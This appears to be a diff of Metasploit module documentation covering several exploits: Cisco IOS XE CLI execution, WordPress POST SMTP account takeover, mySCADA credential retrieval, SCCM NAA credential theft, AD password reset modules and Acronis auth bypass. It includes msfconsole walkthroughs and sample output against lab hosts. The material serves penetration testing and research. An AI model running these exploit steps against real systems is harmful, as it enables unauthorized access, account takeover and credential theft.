+Module options (auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   CMD      show version     yes       The CLI command to execute.
+   MODE     privileged       yes       The mode to execute the CLI command in, valid values are 'user', 'privileged', or 'global'.
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   192.168.86.108   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    443              yes       The target port (TCP)
+   SSL      true             no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > run
+[*] Running module against 192.168.86.108
+
+Cisco IOS XE Software, Version 17.06.05
+Cisco IOS Software [Bengaluru], Virtual XE Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 17.6.5, RELEASE SOFTWARE (fc2)
+Technical Support: http://www.cisco.com/techsupport
+Copyright (c) 1986-2023 by Cisco Systems, Inc.
+Compiled Wed 25-Jan-23 16:07 by mcpre
+Cisco IOS-XE software, Copyright (c) 2005-2023 by cisco Systems, Inc.
+All rights reserved.  Certain components of Cisco IOS-XE software are
+licensed under the GNU General Public License ("GPL") Version 2.0.  The
+software code licensed under GPL Version 2.0 is free software that comes
+with ABSOLUTELY NO WARRANTY.  You can redistribute and/or modify such
+GPL code under the terms of GPL Version 2.0.  For more details, see the
+documentation or "License Notice" file accompanying the IOS-XE software,
+or the applicable URL provided on the flyer accompanying the IOS-XE
+software.
+ROM: IOS-XE ROMMON
+test_c800v uptime is 1 hour, 43 minutes
+Uptime for this control processor is 1 hour, 44 minutes
+System returned to ROM by reload
+System image file is "bootflash:packages.conf"
+Last reload reason: reload
+This product contains cryptographic features and is subject to United
+States and local country laws governing import, export, transfer and
+use. Delivery of Cisco cryptographic products does not imply
+third-party authority to import, export, distribute or use encryption.
+Importers, exporters, distributors and users are responsible for
+compliance with U.S. and local country laws. By using this product you
+agree to comply with applicable laws and regulations. If you are unable
+to comply with U.S. and local laws, return this product immediately.
+A summary of U.S. laws governing Cisco cryptographic products may be found at:
+http://www.cisco.com/wwl/export/crypto/tool/stqrg.html
+If you require further assistance please contact us by sending email to
+export@cisco.com.
+License Level: 
+License Type: Perpetual
+Next reload license Level: 
+Addon License Level: 
+Addon License Type: Subscription
+Next reload addon license Level: 
+The current throughput level is 10000 kbps 
+Smart Licensing Status: Registration Not Applicable/Not Applicable
+cisco C8000V (VXE) processor (revision VXE) with 2027875K/3075K bytes of memory.
+Processor board ID 9VM6T5CQNTE
+Router operating mode: Autonomous
+3 Gigabit Ethernet interfaces
+32768K bytes of non-volatile configuration memory.
+3965316K bytes of physical memory.
+11526144K bytes of virtual hard disk at bootflash:.
+Configuration register is 0x2102
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > run CMD="show clock"
+[*] Running module against 192.168.86.108
+
+*17:36:50.722 UTC Mon Mar 3 2025
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > 
 ```
@@ -31,6 +31,9 @@ The vulnerable IOS XE versions are:
 17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a,
 17.11.99SW

+NOTE: The C8000v series appliance version 17.6.5 was observed to not be vulnerable to CVE-2023-20273, even
+though the IOS XE version indicates they should be vulnerable to CVE-2023-20273.
+
 ## Testing
 This module was tested against IOS XE version 16.12.3. To test this module you will need to either:

@@ -0,0 +1,105 @@
+## Vulnerable Application
+
+The POST SMTP WordPress plugin prior to 2.8.7 is affected by a privilege
+escalation where an unauthenticated user is able to reset the password
+of an arbitrary user. This is done by requesting a password reset, then
+viewing the latest email logs to find the associated password reset email.
+
+### Install
+
+1. Create `wp_post_smtp_acct_takeover.docker-compose.yml` with the content:
+```
+version: '3.1'
+
+services:
+  wordpress:
+    image: wordpress:latest
+    restart: always
+    ports:
+      - 5555:80
+    environment:
+      WORDPRESS_DB_HOST: db
+      WORDPRESS_DB_USER: chocapikk
+      WORDPRESS_DB_PASSWORD: dummy_password
+      WORDPRESS_DB_NAME: exploit_market
+    mem_limit: 512m
+    volumes:
+      - wordpress:/var/www/html
+
+  db:
+    image: mysql:5.7
+    restart: always
+    environment:
+      MYSQL_DATABASE: exploit_market
+      MYSQL_USER: chocapikk
+      MYSQL_PASSWORD: dummy_password
+      MYSQL_RANDOM_ROOT_PASSWORD: '1'
+    volumes:
+      - db:/var/lib/mysql
+
+volumes:
+  wordpress:
+  db:
+
+```
+2. `docker-compose -f wp_post_smtp_acct_takeover.docker-compose.yml up`
+3. `wget https://downloads.wordpress.org/plugin/post-smtp.2.8.6.zip`
+4. `unzip post-smtp.2.8.6.zip`
+5. `docker cp post-smtp <wordpress_container_id>:/var/www/html/wp-content/plugins`
+6. Complete the setup of wordpress
+7. Enable the post-smtp plugin, select "default" for the SMTP service
+  1. Complete the setup using random information, it isn't validated.
+8. Update permalink structure per https://github.com/rapid7/metasploit-framework/pull/18164#issuecomment-1623744244
+  1. Settings -> Permalinks -> Permalink structure -> Select "Post name" -> Save Changes.
+
+
+## Verification Steps
+
+1. Install the vulnerable plugin
+2. Start msfconsole
+3. Do: `use auxiliary/admin/http/wp_post_smtp_acct_takeover`
+4. Do: `set rhost 127.0.0.1`
+5. Do: `set rport 5555`
+6. Do: `set ssl false`
+7. Do: `set username <username>`
+8. Do: `set verbose true`
+9. Do: `run`
+10. Visit the output URL to reset the user's password.
+
+## Options
+
+### USERNAME
+
+The username to perform a password reset against
+
+## Scenarios
+
+### Wordpress 6.6.2 with SMTP Post 2.8.6 on Docker
+
+```
+msf6 > use auxiliary/admin/http/wp_post_smtp_acct_takeover
+msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > set rhost 127.0.0.1
+rhost => 127.0.0.1
+msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > set rport 5555
+rport => 5555
+msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > set ssl false
+ssl => false
+msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > set username admin
+username => admin
+msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > set verbose true
+verbose => true
+msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > run
+[*] Running module against 127.0.0.1
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking /wp-content/plugins/post-smtp/readme.txt
+[*] Found version 2.8.6 in the plugin
+[+] The target appears to be vulnerable.
+[*] Attempting to Registering token fUefO7U12dXtb0DM on device GP3tOFuMfFErw
+[+] Succesfully created token: fUefO7U12dXtb0DM
+[*] Requesting logs
+[*] Requesting email content from logs for ID 4
+[+] Full text of log saved to: /home/mtcyr/.msf4/loot/20241029142103_default_127.0.0.1_wordpress.post_s_367186.txt
+[+] Reset URL: http://127.0.0.1:5555/wp-login.php?action=rp&key=4kxMwfuvyQtcUDVrh985&login=admin&wp_lang=en_US
+[*] Auxiliary module execution completed
+```
@@ -5,7 +5,7 @@ This module can read, write, update, and delete AD CS certificate templates from
 The READ, UPDATE, and DELETE actions will write a copy of the certificate template to disk that can be
 restored using the CREATE or UPDATE actions. The CREATE and UPDATE actions require a certificate template data
 file to be specified to define the attributes. Template data files are provided to create a template that is
-vulnerable to ESC1, ESC2, and ESC3.
+vulnerable to ESC1, ESC2, ESC3 and ESC15.

 This module is capable of exploiting ESC4.

@@ -0,0 +1,39 @@
+## Introduction
+
+Allows changing or resetting users' passwords over the LDAP protocol (particularly for Active Directory).
+
+"Changing" refers to situations where you know the value of the existing password, and send that to the server as part of the password modification.
+"Resetting" refers to situations where you may not know the value of the existing password, but by virtue of your permissions over the target account, you can force-change the password without necessarily knowing it.
+
+Note that users can typically not reset their own passwords (unless they have very high privileges), but can usually change their password as long as they know the existing one.
+
+This module works with existing sessions (or relaying), especially for Resetting, wherein the target's password is not required.
+
+## Actions
+
+- `RESET` - Reset the target's password without knowing the existing one (requires appropriate permissions)
+- `CHANGE` - Change the user's password, knowing the existing one.
+
+## Options
+
+The required options are based on the action being performed:
+
+- When resetting a password, you must specify the `TARGET_USER`
+- When changing a password, you must specify the `USERNAME` and `PASSWORD`, even if using an existing session (since the API requires both of these to be specified, even for open LDAP sessions)
+- The `NEW_PASSWORD` option must always be provided
+
+**USERNAME**
+
+The username to use to authenticate to the server. Required for changing a password, even if using an existing session.
+
+**PASSWORD**
+
+The password to use to authenticate to the server, prior to performing the password modification. Required for changing a password, even if using an existing session (since the server requires proof that you know the existing password).
+
+**TARGET_USER**
+
+For resetting passwords, the user account for which to reset the password. The authenticated account (username) must have privileges over the target user (e.g. Ownership, or the `User-Force-Change-Password` extended right)
+
+**NEW_PASSWORD**
+
+The new password to set.
@@ -62,14 +62,14 @@ PropagationFlags      : None

 ## Module usage

-The `admin/dcerpc/samr_computer` module is generally used to first create a computer account, which requires no permissions:
+The `admin/dcerpc/samr_account` module is generally used to first create a computer account, which by default, all user accounts in a domain can perform:

 1. From msfconsole
-2. Do: `use auxiliary/admin/dcerpc/samr_computer`
+2. Do: `use auxiliary/admin/dcerpc/samr_account`
 3. Set the `RHOSTS`, `SMBUser` and `SMBPass` options
-   a. For the `ADD_COMPUTER` action, if you don't specify `COMPUTER_NAME` or `COMPUTER_PASSWORD` - one will be generated automatically
-   b. For the `DELETE_COMPUTER` action, set the `COMPUTER_NAME` option
-   c. For the `LOOKUP_COMPUTER` action, set the `COMPUTER_NAME` option
+   a. For the `ADD_COMPUTER` action, if you don't specify `ACCOUNT_NAME` or `ACCOUNT_PASSWORD` - one will be generated automatically
+   b. For the `DELETE_ACCOUNT` action, set the `ACCOUNT_NAME` option
+   c. For the `LOOKUP_ACCOUNT` action, set the `ACCOUNT_NAME` option
 4. Run the module and see that a new machine account was added

 Then the `auxiliary/admin/ldap/rbcd` can be used:
@@ -121,19 +121,30 @@ with the Service for User (S4U) Kerberos extension.
 First create the computer account:

 ```msf
-msf6 auxiliary(admin/dcerpc/samr_computer) > show options
+msf6 auxiliary(admin/dcerpc/samr_account) > show options

-Module options (auxiliary/admin/dcerpc/samr_computer):
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   ACCOUNT_NAME                       no        The account name
+   ACCOUNT_PASSWORD                   no        The password for the new account

-   Name               Current Setting  Required  Description
-   ----               ---------------  --------  -----------
-   COMPUTER_NAME                       no        The computer name
-   COMPUTER_PASSWORD                   no        The password for the new computer
-   RHOSTS                              yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
-   RPORT              445              yes       The target port (TCP)
-   SMBDomain          .                no        The Windows domain to use for authentication
-   SMBPass                             no        The password for the specified username
-   SMBUser                             no        The username to authenticate as
+
+   Used when connecting via an existing SESSION:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION                   no        The session to run this module on
+
+
+   Used when making a new connection via RHOSTS:
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   RHOSTS                      no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      445              yes       The target port (TCP)
+   SMBDomain  .                no        The Windows domain to use for authentication
+   SMBPass                     no        The password for the specified username
+   SMBUser                     no        The username to authenticate as


 Auxiliary action:
@@ -143,13 +154,13 @@ Auxiliary action:
   ADD_COMPUTER  Add a computer account


-msf6 auxiliary(admin/dcerpc/samr_computer) > set RHOSTS 192.168.159.10
+msf6 auxiliary(admin/dcerpc/samr_account) > set RHOSTS 192.168.159.10
 RHOSTS => 192.168.159.10
-msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBUser sandy
+msf6 auxiliary(admin/dcerpc/samr_account) > set SMBUser sandy
 SMBUser => sandy
-msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBPass Password1!
+msf6 auxiliary(admin/dcerpc/samr_account) > set SMBPass Password1!
 SMBPass => Password1!
-msf6 auxiliary(admin/dcerpc/samr_computer) > run
+msf6 auxiliary(admin/dcerpc/samr_account) > run
 [*] Running module against 192.168.159.10

 [*] 192.168.159.10:445 - Using automatically identified domain: MSFLAB
@@ -157,7 +168,7 @@ msf6 auxiliary(admin/dcerpc/samr_computer) > run
 [+] 192.168.159.10:445 -   Password: A2HPEkkQzdxQirylqIj7BxqwB7kuUMrT
 [+] 192.168.159.10:445 -   SID:      S-1-5-21-3402587289-1488798532-3618296993-1655
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/dcerpc/samr_computer) > use auxiliary/admin/ldap/rbcd
+msf6 auxiliary(admin/dcerpc/samr_account) > use auxiliary/admin/ldap/rbcd
 ```

 Now use the RBCD module to read the current value of `msDS-AllowedToActOnBehalfOfOtherIdentity`:
@@ -181,7 +192,7 @@ msf6 auxiliary(admin/ldap/rbcd) > read
 [*] Auxiliary module execution completed
 ```

-Writing a new `msDS-AllowedToActOnBehalfOfOtherIdentity` value using the computer account created by `admin/dcerpc/samr_computer`:
+Writing a new `msDS-AllowedToActOnBehalfOfOtherIdentity` value using the computer account created by `admin/dcerpc/samr_account`:

 ```msf
 msf6 auxiliary(admin/ldap/rbcd) > set DELEGATE_FROM DESKTOP-QLSTR9NW$
@@ -0,0 +1,64 @@
+## Vulnerable Application
+
+**Vulnerability Description**
+
+This module exploits two vulnerabilities (CVE-2025-24865 & CVE-2025-22896) in mySCADA MyPRO Manager <= v1.3 to retrieve the configured
+credentials for the mail server.
+
+The administrative web interface has certain features where credentials are required to be accessed, but the implementation is flawed,
+allowing to bypass the requirement. Other important administrative features do not require credentials at all, allowing an unauthenticated
+remote attacker to perform privileged actions. These issues are tracked through CVE-2025-24865.
+Another vulnerability, tracked through CVE-2025-22896, is related to the cleartext storage of various credentials by the application.
+
+One way how these issues can be exploited is to allow an unauthenticated remote attacker to retrieve the cleartext credentials of the mail
+server that is configured by the product, which this module does.
+
+Versions <= 1.3 are affected. CISA published [ICSA-25-044-16](https://www.cisa.gov/news-events/ics-advisories/icsa-25-044-16) to cover
+the security issues.
+
+**Vulnerable Application Installation**
+
+A trial version of the software can be obtained from [the vendor](https://www.myscada.org/mypro/).
+
+**Successfully tested on**
+
+- mySCADA MyPRO Manager 1.3 on Windows 11 (22H2)
+
+## Verification Steps
+
+1. Install the application
+2. After installation, reboot the system and wait some time until a runtime (e.g., 9.2.1) has been fetched and installed.
+3. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use auxiliary/admin/scada/mypro_mgr_creds 
+msf6 auxiliary(admin/scada/mypro_mgr_creds) > set RHOSTS <IP>
+msf6 auxiliary(admin/scada/mypro_mgr_creds) > run 
+```
+
+## Scenarios
+
+Running the module against MyPRO Manager v1.3 on Windows 11, should result in an output similar to the
+following:
+
+```
+msf6 auxiliary(admin/scada/mypro_mgr_creds) > run
+[*] Running module against 192.168.1.78
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[+] Mail server credentials retrieved:
+[+] Host: smtp.example.com
+[+] Port: 993
+[+] Auth Type: login
+[+] User: user
+[+] Password: SuperS3cr3t!
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/scada/mypro_mgr_creds) > creds
+Credentials
+===========
+
+host          origin        service           public  private       realm  private_type  JtR Format  cracked_password
+----          ------        -------           ------  -------       -----  ------------  ----------  ----------------
+192.168.1.78  192.168.1.78  34022/tcp (http)  user    SuperS3cr3t!         Password
+```
@@ -0,0 +1,150 @@
+## NAA Credential Exploitation
+
+The NAA account is used by some SCCM configurations in the policy deployment process. It does not require many privileges, but 
+in practice is often misconfigured to have excessive privileges.
+
+The account can be retrieved in various ways, many requiring local administrative privileges on an existing host. However,
+it can also be requested by an existing computer account, which by default most user accounts are able to create.
+
+
+## Module usage
+The `admin/dcerpc/samr_computer` module is generally used to first create a computer account, which requires no permissions:
+
+1. From msfconsole
+2. Do: `use auxiliary/admin/dcerpc/samr_account`
+3. Set the `RHOSTS`, `SMBUser` and `SMBPass` options
+   a. For the `ADD_COMPUTER` action, if you don't specify `ACCOUNT_NAME` or `ACCOUNT_PASSWORD` - one will be generated automatically
+   b. For the `DELETE_ACCOUNT` action, set the `ACCOUNT_NAME` option
+   c. For the `LOOKUP_ACCOUNT` action, set the `ACCOUNT_NAME` option
+4. Run the module and see that a new machine account was added
+
+Then the `auxiliary/admin/sccm/get_naa_credentials` module can be used:
+
+1. `use auxiliary/admin/sccm/get_naa_credentials`
+2. Set the `RHOST` value to a target domain controller (if LDAP autodiscovery is used)
+3. Set the `USERNAME` and `PASSWORD` information to a domain account
+4. Set the `COMPUTER_USER` and `COMPUTER_PASSWORD` to the values obtained through the `samr_computer` module
+5. Run the module to obtain the NAA credentials, if present.
+
+Alternatively, if the Management Point and Site Code are known, the module can be used without autodiscovery:
+
+1. `use auxiliary/admin/sccm/get_naa_credentials`
+2. Set the `COMPUTER_USER` and `COMPUTER_PASSWORD` to the values obtained through the `samr_computer` module
+3. Set the `MANAGEMENT_POINT` and `SITE_CODE` to the known values.
+4. Run the module to obtain the NAA credentials, if present.
+
+The management point and site code can be retrieved using the `auxiliary/gather/ldap_query` module, using the `ENUM_SCCM_MANAGEMENT_POINTS` action.
+
+See the Scenarios for a more detailed walk through
+
+## Options
+
+### RHOST, USERNAME, PASSWORD, DOMAIN, SESSION, RHOST
+Options used to authenticate to the Domain Controller's LDAP service for SCCM autodiscovery.
+
+### COMPUTER_USER, COMPUTER_PASSWORD
+
+Credentials for a computer account (may be created with the `samr_account` module). If you've retrieved the NTLM hash of
+a computer account, you can use that for COMPUTER_PASSWORD.
+
+### MANAGEMENT_POINT
+The SCCM server.
+
+### SITE_CODE
+The Site Code of the management point.
+
+## Scenarios
+In the following example the user `ssccm.lab\eve` is a low-privilege user.
+
+### Creating computer account
+
+```
+msf6 auxiliary(admin/dcerpc/samr_account) > run rhost=192.168.33.10 domain=sccm.lab username=eve password=iloveyou
+[*] Running module against 192.168.33.10
+
+[*] 192.168.33.10:445 - Adding computer
+[+] 192.168.33.10:445 - Successfully created sccm.lab\DESKTOP-2KVDWNZ3$
+[+] 192.168.33.10:445 -   Password: pJTrvFyDHiHnqtlqTTNYe2HPVpO3Yekj
+[+] 192.168.33.10:445 -   SID:      S-1-5-21-3875312677-2561575051-1173664991-1128
+[*] Auxiliary module execution completed
+```
+
+### Running with Autodiscovery
+Using the credentials just obtained with the `samr_account` module.
+
+```
+msf6 auxiliary(admin/sccm/get_naa_credentials) > options
+
+Module options (auxiliary/admin/sccm/get_naa_credentials):
+
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   COMPUTER_PASS                      yes       The password of the provided computer account
+   COMPUTER_USER                      yes       The username of a computer account
+   MANAGEMENT_POINT                   no        The management point (SCCM server) to use
+   SITE_CODE                          no        The site code to use on the management point
+   SSL               false            no        Enable SSL on the LDAP connection
+   VHOST                              no        HTTP server virtual host
+
+
+   Used when connecting via an existing SESSION:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION  1                no        The session to run this module on
+
+
+   Used when making a new connection via RHOSTS:
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   DOMAIN                     no        The domain to authenticate to
+   PASSWORD                   no        The password to authenticate with
+   RHOSTS                     no        The domain controller (for autodiscovery). Not required if providing a management point and site code
+   RPORT     389              no        The LDAP port of the domain controller (for autodiscovery). Not required if providing a management point and site code (TCP)
+   USERNAME                   no        The username to authenticate with
+
+
+View the full module info with the info, or info -d command.
+msf6 auxiliary(admin/sccm/get_naa_credentials) > run rhost=192.168.33.10 username=eve domain=sccm.lab password=iloveyou computer_user=DESKTOP-2KVDWNZ3$ computer_pass=pJTrvFyDHiHnqtlqTTNYe2HPVpO3Yekj
+[*] Running module against 192.168.33.10
+
+[*] Discovering base DN automatically
+[*] 192.168.33.10:389 Discovered base DN: DC=sccm,DC=lab
+[+] Found Management Point: MECM.sccm.lab (Site code: P01)
+[*] Got SMS ID: BD0DC478-A71A-4348-BD14-B7E91335738E
+[*] Waiting 5 seconds for SCCM DB to update...
+[*] Got NAA Policy URL: http://<mp>/SMS_MP/.sms_pol?{c48754cc-090c-4c56-ba3d-532b5ce5e8a5}.2_00
+[+] Found valid NAA credentials: sccm.lab\sccm-naa:123456789
+[*] Auxiliary module execution completed
+```
+
+### Manual discovery
+
+```
+msf6 auxiliary(gather/ldap_query) > run rhost=192.168.33.10 username=eve domain=sccm.lab password=iloveyou
+[*] Running module against 192.168.33.10
+
+[*] 192.168.33.10:389 Discovered base DN: DC=sccm,DC=lab
+CN=SMS-MP-P01-MECM.SCCM.LAB,CN=System Management,CN=System,DC=sccm,DC=lab
+=========================================================================
+
+ Name           Attributes
+ ----           ----------
+ cn             SMS-MP-P01-MECM.SCCM.LAB
+ dnshostname    MECM.sccm.lab
+ mssmssitecode  P01
+
+[*] Query returned 1 result.
+[*] Auxiliary module execution completed
+
+msf6 auxiliary(gather/ldap_query) > use auxiliary/admin/sccm/get_naa_credentials
+
+msf6 auxiliary(admin/sccm/get_naa_credentials) > run computer_user=DESKTOP-2KVDWNZ3$ computer_pass=pJTrvFyDHiHnqtlqTTNYe2HPVpO3Yekj management_point=MECM.sccm.lab site_code=P01
+
+[*] Got SMS ID: BD0DC478-A71A-4348-BD14-B7E91335738E
+[*] Waiting 5 seconds for SCCM DB to update...
+[*] Got NAA Policy URL: http://<mp>/SMS_MP/.sms_pol?{c48754cc-090c-4c56-ba3d-532b5ce5e8a5}.2_00
+[+] Found valid NAA credentials: sccm.lab\sccm-naa:123456789
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,46 @@
+## Introduction
+
+Allows changing or resetting users' passwords.
+
+"Changing" refers to situations where you know the value of the existing password, and send that to the server as part of the password modification.
+"Resetting" refers to situations where you may not know the value of the existing password, but by virtue of your permissions over the target account, you can force-change the password without necessarily knowing it.
+
+Note that users can typically not reset their own passwords (unless they have very high privileges).
+
+This module works with existing sessions (or relaying), especially for Reset use cases, wherein the target's password is not required.
+
+## Actions
+
+- `RESET` - Reset the target's password without knowing the existing one (requires appropriate permissions). New AES kerberos keys will be generated.
+- `RESET_NTLM` - Reset the target's NTLM hash, without knowing the existing password. AES kerberos authentication will not work until a standard password change occurs.
+- `CHANGE` - Change the password, knowing the existing one. New AES kerberos keys will be generated.
+- `CHANGE_NTLM` - Change the password to a NTLM hash value, knowing the existing password. AES kerberos authentication will not work until a standard password change occurs.
+
+## Options
+
+The required options are based on the action being performed:
+
+- When resetting a password, you must specify the `TARGET_USER`
+- When changing a password, you must specify the `SMBUser` and `SMBPass`, even if using an existing session (since the API requires both of these to be specified, even for open SMB sessions)
+- When resetting or changing a password, you must specify `NEW_PASSWORD`
+- When resetting or changing an NTLM hash, you must specify `NEW_NTLM`
+
+**SMBUser**
+
+The username to use to authenticate to the server. Required for changing a password, even if using an existing session.
+
+**SMBPass**
+
+The password to use to authenticate to the server, prior to performing the password modification. Required for changing a password, even if using an existing session (since the server requires proof that you know the existing password).
+
+**TARGET_USER**
+
+For resetting passwords, the user account for which to reset the password. The authenticated account (SMBUser) must have privileges over the target user (e.g. Ownership, or the `User-Force-Change-Password` extended right)
+
+**NEW_PASSWORD**
+
+The new password to set for `RESET` and `CHANGE` actions. 
+
+**NEW_NTLM**
+
+The new NTLM hash to set for `RESET_NTLM` and `CHANGE_NTLM` actions. This can either be an NT hash, or a colon-delimited NTLM hash.
@@ -0,0 +1,205 @@
+## Vulnerable Application
+Acronis Cyber Protect or Backup is an enterprise backup/recovery solution for all, compute, storage and application resources.
+Businesses and Service Providers are using it to protect and backup all IT assets in their IT environment.
+
+This module exploits an authentication bypass vulnerability at the Acronis Cyber Protect appliance which,
+in its default configuration, allows the anonymous registration of new backup/protection agents on new endpoints.
+This API endpoint also generates bearer tokens which the agent then uses to authenticate to the appliance.
+As the management web console is running on the same port as the API for the agents,
+this bearer token is also valid for any actions on the web console.
+This allows an attacker with network access to the appliance to start the registration of a new agent,
+retrieve a bearer token that provides admin access to the available functions in the web console.
+
+This module will gather all machine info (endpoints) configured and managed by the appliance.
+This information can be used in a subsequent attack that exploits this vulnerability to execute arbitrary commands
+on both the managed endpoint and the appliance itself.
+This exploit is covered in another module `exploit/multi/acronis_cyber_protect_unauth_rce_cve_2022_3405`.
+
+Acronis Cyber Protect 15 (Windows, Linux) before build 29486 and
+Acronis Cyber Backup 12.5 (Windows, Linux) before build 16545 are vulnerable.
+
+The following releases were tested.
+
+**Acronis Cyber Protect 15  ISO appliances:**
+* Acronis Cyber Protect 15 Build 28503
+* Acronis Cyber Protect 15 Build 27009
+* Acronis Cyber Protect 15 Build 26981
+* Acronis Cyber Protect 15 Build 26172
+
+**Acronis Cyber Protect 12.5  ISO appliances:**
+* Acronis Cyber Protect 12.5 Build 16428
+* Acronis Cyber Protect 12.5 Build 16386
+* Acronis Cyber Protect 12.5 Build 14330
+* Acronis Cyber Protect 12.5 Build 11010
+
+## Installation steps to install the Acronis Cyber Protect/Backup appliance
+* Install the virtualization engine VMware Fusion on your preferred platform.
+* [Install VMware Fusion on MacOS](https://knowledge.broadcom.com/external/article/315638/download-and-install-vmware-fusion.html).
+* [Download ISO Image](https://care.acronis.com/s/article/71847-Acronis-Cyber-Protect-Links-to-download-installation-files?language=en_US).
+* Install the Acronis iso image in your virtualization engine by unzipping the appliance image and import the `ovf` image.
+* During the boot, select `Install appliance` and  configure the installation settings such as setting the root password and IP address
+* using the option `change installation settings`.
+* Boot up the VM and should be able to access the Acronis Cyber Protect/Backup appliance either thru the console, `ssh` on port `22`
+* via the `webui` via `http://your_ip:9877`.
+* Ensure that you have registered yourself on the Acronis Web site and applied for the 30-days trial for Acronis Cyber Protect.
+* Login into the appliance via the `webui`.
+* Follow the license instructions to apply your 30-day trial license.
+
+You are now ready to test the module.
+
+## Verification Steps
+- [ ] Start `msfconsole`
+- [ ] `auxiliary/gather/acronis_cyber_protect_machine_info_disclosure`
+- [ ] `set rhosts <ip-target>`
+- [ ] `run`
+- [ ] you should get a list of all endpoints that are registered at the appliance.
+
+## Options
+### OUTPUT
+You can use option `table` to print output of the gather info to the console (default).
+Choosing option `json` will store all information at a file in `json` format at the loot directory.
+You can use this file in combination with `jq` for offline queries and processing.
+
+## Scenarios
+```msf
+msf6 auxiliary(gather/acronis_cyber_protect_machine_info_disclosure) > info
+
+       Name: Acronis Cyber Protect/Backup machine info disclosure
+     Module: auxiliary/gather/acronis_cyber_protect_machine_info_disclosure
+    License: Metasploit Framework License (BSD)
+       Rank: Excellent
+
+Provided by:
+  h00die-gr3y <h00die.gr3y@gmail.com>
+  Sandro Tolksdorf of usd AG.
+
+Module side effects:
+ artifacts-on-disk
+ ioc-in-logs
+
+Module stability:
+ crash-safe
+
+Module reliability:
+ repeatable-session
+
+Check supported:
+  Yes
+
+Basic options:
+  Name       Current Setting  Required  Description
+  ----       ---------------  --------  -----------
+  OUTPUT     table            yes       Output format to use (Accepted: table, json)
+  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
+                                        metasploit.html
+  RPORT      9877             yes       The target port (TCP)
+  SSL        true             no        Negotiate SSL/TLS for outgoing connections
+  TARGETURI  /                yes       The URI of the vulnerable Acronis Cyber Protect/Backup instance
+  VHOST                       no        HTTP server virtual host
+
+Description:
+  Acronis Cyber Protect or Backup is an enterprise backup/recovery solution for all,
+  compute, storage and application resources. Businesses and Service Providers are using it
+  to protect and backup all IT assets in their IT environment.
+  This module exploits an authentication bypass vulnerability at the Acronis Cyber Protect
+  appliance which, in its default configuration, allows the anonymous registration of new
+  backup/protection agents on new endpoints. This API endpoint also generates bearer tokens
+  which the agent then uses to authenticate to the appliance.
+  As the management web console is running on the same port as the API for the agents, this
+  bearer token is also valid for any actions on the web console. This allows an attacker
+  with network access to the appliance to start the registration of a new agent, retrieve
+  a bearer token that provides admin access to the available functions in the web console.
+
+  This module will gather all machine info (endpoints) configured and managed by the appliance.
+  This information can be used in a subsequent attack that exploits this vulnerability to
+  execute arbitrary commands on both the managed endpoint and the appliance which is covered
+  in another module `exploit/multi/acronis_cyber_protect_unauth_rce_cve_2022_3405`.
+
+  Acronis Cyber Protect 15 (Windows, Linux) before build 29486 and
+  Acronis Cyber Backup 12.5 (Windows, Linux) before build 16545 are vulnerable.
+
+References:
+  https://nvd.nist.gov/vuln/detail/CVE-2022-30995
+  https://nvd.nist.gov/vuln/detail/CVE-2022-3405
+  https://herolab.usd.de/security-advisories/usd-2022-0008/
+  https://attackerkb.com/topics/27RudJXbN4/cve-2022-30995
+
+View the full module info with the info -d command.
+```
+### Acronis Cyber Backup 12.5 build 14330 VMware appliance
+```msf
+msf6 auxiliary(gather/acronis_cyber_protect_machine_info_disclosure) > set rhosts 192.168.201.6
+rhosts => 192.168.201.6
+msf6 auxiliary(gather/acronis_cyber_protect_machine_info_disclosure) > run
+
+[*] Running module against 192.168.201.6
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated.
+[*] Retrieve the first access token.
+[*] Register a dummy backup agent.
+[*] Dummy backup agent registration is successful.
+[*] Retrieve the second access token.
+[+] The target appears to be vulnerable. Acronis Cyber Protect/Backup 12.5.14330
+[*] Retrieve all managed endpoint configuration details registered at the Acronis Cyber Protect/Backup appliance.
+[*] List the managed endpoints registered at the Acronis Cyber Protect/Backup appliance.
+[*] ----------------------------------------
+[+] hostId: 28BAFD9F-F9F1-481F-A970-1A6ED70736AC
